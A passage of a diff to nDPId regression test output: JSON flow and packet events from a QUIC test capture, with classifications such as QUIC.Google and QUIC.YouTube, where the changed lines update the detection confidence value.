+00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431309055,"flow_last_seen":1621431309055,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":63136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431576853,"flow_last_seen":1621431576853,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":51296,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1621431576853,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431576853,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFQlAAH4RYPOokEAFgPgYAchgAbsFTnq0wv8AAB0IQJ4IpSc1aNIANwCZc\/3f1l3vg6YZeTNl87IqhJ27nCcuea\/qvb41mLVKUuBIV5pQThWzegD9xWcQRyZSfI7h79NE\/YUm1oAXrFrCT3TkbHGJwP3KBfTu3orp0WCwk0l4MiqV0DClWwpW\/1NKhCfuNkry0QNEwg5pHZb\/vSK\/s\/a8cF3aIAtN637iUzqyfqlQEpk\/TZCqI5tarhaQzSJ4uSDtYWWFCyQdGrPQxx36Ty1apquBRh7LpqS3HzTGXWn1iXBjJTo2oNMvvW5LV8Ozlo+ykFGxJKjaz+YxvcqhT3PapUN200W+09yqn+UXzRAxphjhSHCFmnFGaD1Cmd2AoqB2RODbBdfTfnO0p+5IwFP+QXYCSCui22wiXW71huSyPhBNTXtdjBnB0aI7RQe9BP\/8cTXCHdvaiOWZbEqGPCEZpsonT5okRzLwKKitPO9lmE6w6XZFQF+AwHMppJIEs+V4\/+utYSZGmsenl8sXZa5i3PEJK+hPz90wGXsjo2vNoA9zBeskKRP31j+JnkVWm6+SeE\/XRpijNighimBNH4TAc1SkFEUDYnbj8\/dvi6K8\/bLnWnO5ZEd5IeQ8y49ijX2T\/6gXriwCkzq1N2nFeCTG9C25WLUIBOWbIgjk\/+rRxff3yEw3Cf0EsWpP57l3vuNRPUUM9k6QGTA+VA1VqhI5cq5zqw3USveM+coEGcG1czX5cJsPCLcDVcPmIyqMPFVLeTlqZ1e993EuXFPOAn7\/j9tmZpD0F7W3EcJhPNBgFb8I9AuIGuTFhDSHGIm1+udcX3QtCfqh23mMSbz03kWO\/8Pc52Aj8EV9FAJ++uk6cpcxlqReXfPX+orcIqI07HBHS4wZHhfWa4II0L8ZmZqChXEQh4SRM5QraEDhiDgHu2Wr\/XrZ+LTSmy6GJnpyoczRJsxWL+SqSeaD+rxyEDOOHfzLTMkqwLlJdA5\/bX9M6EkuaQ7fp6odWxiaULg9HlTuvy4eSg1Y+BunaS6DHxROL7RTUmCWNUYbZhsn7mUOPPTqltAXc+wYwHbtEmsu3lqjKjPQEUq39uJ2DkvHyNGNu15OR5jgmIUl9ra0cSZwJSuq26MGcArS+trbqUaRVMldH30c\/MqtoFc0+kTZkdf2zXVOuhlhIHDu5oivOacupqIMRXqQvnAj9e3Szh7HtmF\/ZTqRfgMooySSCala0vsE5E7aOt7QgfLg9p0zs80j5g\/fIFZXq6e3PRZGJlOduO5u\/FTED0nlkOStAfZ1cLQvrXot9UJE83tMH4DWSX6zM9DnOiDmars1HY1Qu1gozfortWRStAAQrzDmILzgi+tPIyMlRG1aiOK3rlgWXZwKS5kvAXGSQQPfQS9NlLwCrZHQT69B6mWCBPUBWh8QsOqv76k4Jv46eHsK0hoU92HUqhOqgk09EQBCnGI\/zWgYxU42nbsJkiMdKoLbVeUFxPtnCdHCWdIgtqELcoRLCnlfyj6fLmSJose7
rxid75fKfwhgi9zbXUZHzUBVvrHaO1NpbexSUM4VztLAkHYegA4mZsAUTMXrwzehYvktbWieQfVgMvUC0tW6eNm9CeJQwCRuFen27D7bblWN395kZABQJz2J7igCkCcenO9hEEn4u3aBeGpUqZzmS+2bCxYqraA8Fpg0t+bmHW17tRBn26Wlj\/IBR5faBKZzUPN15J\/fmg\/PqeAeDRy7HA\/FEBoAg9iJEv3ZRqMQz+xrjOv+G3\/dDpiheVzILmxX+EOrazHQswKRcYoP3gCsVHHcszDooALZcZ+BQQzftaJeRTwIbx4z"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431576853,"flow_last_seen":1621431576853,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":51296,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431370645,"flow_last_seen":1621431370645,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54016,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 
-00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431369135,"flow_last_seen":1621431369135,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":63163,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431370796,"flow_last_seen":1621431370796,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.42.133.245","src_port":51248,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
-00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431355629,"flow_last_seen":1621431355629,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":51456,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431576853,"flow_last_seen":1621431576853,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":51296,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 
+00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431370645,"flow_last_seen":1621431370645,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54016,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431369135,"flow_last_seen":1621431369135,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":63163,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431370796,"flow_last_seen":1621431370796,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.42.133.245","src_port":51248,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431355629,"flow_last_seen":1621431355629,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":51456,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
00629{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431760040,"flow_last_seen":1621431760040,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.83.40.87","src_port":57767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1621431760040,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431760040,"pkt":"AAAAAAAAAAEAdQOrCABFAAVizP5AAH4RzUyokEAFTFMoV+GnAbsFTrfUwP8AAB0I5zcbzyTN1LMAAEU085Brpbyr+2jh\/NyWKUdWZh90hrqs\/JUnV06AWtlVkrCYYR00Pib5lXHukuswI4apeXXYya1wVBFr8DpPUkWiGoC3sbaSvRZYYp3tBYoEJo8YIhwPSxXaYFfD6\/RsiM+Yfb2H1k8FEvnnpg0sxOjmgBY+O4W2eynZXgCIIV38HEw+wEDjZA2kk7L82T1bQYySl7HgNdHSquKu8SR8yPJcn8V2uMxsDXUCsucyI4\/wZySpci4W3UjA6hpswJQYsYncOuLPMzriT9nvkw9UXOlgzjajXpXUd\/JGwl0HyONFBLUkUDKjyeQYXeGyQW3ma\/zK00kJSnfXLEQC\/601KkV16N6qrZ0v5OR1cTLHDvXTzpfU721p0tTNZjXqZrYlC5ApJ869tkJz0gvSI815yu\/1aSemEd+xL\/8oRmyBCIllJq+YA3vMuW0w4\/T5JBaRPvDu30haGDWrTxiRXXYta2\/CdqVvbjVJtiTfDkkC1bYeze+3Ah85\/uP8diiaa9AR8AKCUBgQdJ3mENPMmAvvqo\/B+ziY39N9FFetzWHMNvAzeRNXDdkoheBvxSnvCsDetHFzuAVJDYI\/bys388LAY+YcZ2PLXZ4i6IMVrySiDR3dBi9J6Xh51PGX4vbMQUcpCXv4G342VJ1caxMpMC0WKSvRN\/bqWlMQ+RF7oj6QAUiBi3SwgLkBBChaMRaz6hO+99tY2xzKs6MRliASieiMP732ghruPSLQ+wkW3s1+76mAlzozUQwzPbS1PGTHvC010AWavdSmg87MToOsLUXgD4HnFyn2h8N\/zN0Y9kv+731G9nuRhhLm0utvCdYH7hRWyLbk56OLgd+REv
XXwQQQpBwKlWgfOj3W3\/5qVvPq3e+dNdLj6fyCzr2ipjs5XbBlzIlCeM\/X82w9I6lQbG2MB8pWKZKtLdibzQ7WTlOJqcJ2CMdQhgH9A1bdiqPv\/gr5wXKSRUUJATME8kPSQNByUdL7GTcCBNzP+8ZUAcsI0bM2tgOdWh0suQyngSZKgXVLvx6wGBu+1wF\/mC2T9fk50gp1zDgTxJjhtLxXk3ylwvBp311b2znJyXpnhAKEllhdOQr6Tr8CSn8jAdZm+gC\/EWrlnqxU3bjZ8FRmLt5X6O3NKJ6DoHTIz7S4IKZcp2EE\/qrF59y9ofjxJIdx0H9xpLiBAZaTSw63h0cJs0HrTSWerWgqOhr90\/R76Qs8o\/fRdj0KfsMdcJ0uNDyxtoSBePmAxqS4gAyc7hFHKfA41dW9prrj3pJtaB8l6RP06jKTbRRFyZuDe6A9VYcgFUSM2zXSaVtYhvAVkemhrcWVfhKpPRpQAijaZZT4By9Fc75mrUC8\/jXvh0rSqRaZF4w8CZTfLoxB2+fbxhXS\/y2T4EIEyiUFCUG8C69qtn9uZOcZ3P61zXWpjuvaUy96vWpLSu3t+0FalFdLvnA8VuSf2lAEClkALW3Dl4vLfiIlNB4emRks21g88RhpsKHyXLOxAkbKh50EqqlhB1mllDYGWbm\/4xaT9s3Zafiaab8TWadT6jVEwkNzekV\/0AbiRBOXrL6jktjB5jxq4zn7l3VgtdxFNAmFQYDibYgJ3De9KSyXejEY1rNESvwittZgupicY+Dm1OETIost\/wF\/G3hHSgdvFNBHmfdSw4NKdZwUuGXdqN5OH9Rvmel41BzbqTaqBCe1ri0\/9znww4gdI1VUL9A6rt9xHmn2T0Eu019PmuUftYMzGJ+Wp8LyQupxLYsYZE2Wjo3Ainf0KmDOU7NxfIE1yCKzpfBd"} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431760040,"flow_last_seen":1621431760040,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.83.40.87","src_port":57767,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r11---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
-00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431576853,"flow_last_seen":1621431576853,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":51296,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431431363,"flow_last_seen":1621431431363,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"45.228.175.189","src_port":60896,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
-00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431520499,"flow_last_seen":1621431520499,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":49153,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431482942,"flow_last_seen":1621431482942,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"177.86.46.206","src_port":56488,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 
-00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431465588,"flow_last_seen":1621431465588,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60551,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431760040,"flow_last_seen":1621431760040,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.83.40.87","src_port":57767,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r11---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
+00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431576853,"flow_last_seen":1621431576853,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":51296,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431431363,"flow_last_seen":1621431431363,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"45.228.175.189","src_port":60896,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
+00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431520499,"flow_last_seen":1621431520499,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":49153,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431482942,"flow_last_seen":1621431482942,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"177.86.46.206","src_port":56488,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 
+00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431465588,"flow_last_seen":1621431465588,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60551,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431857841,"flow_last_seen":1621431857841,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431857841,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"213.188.47.247","src_port":63736,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
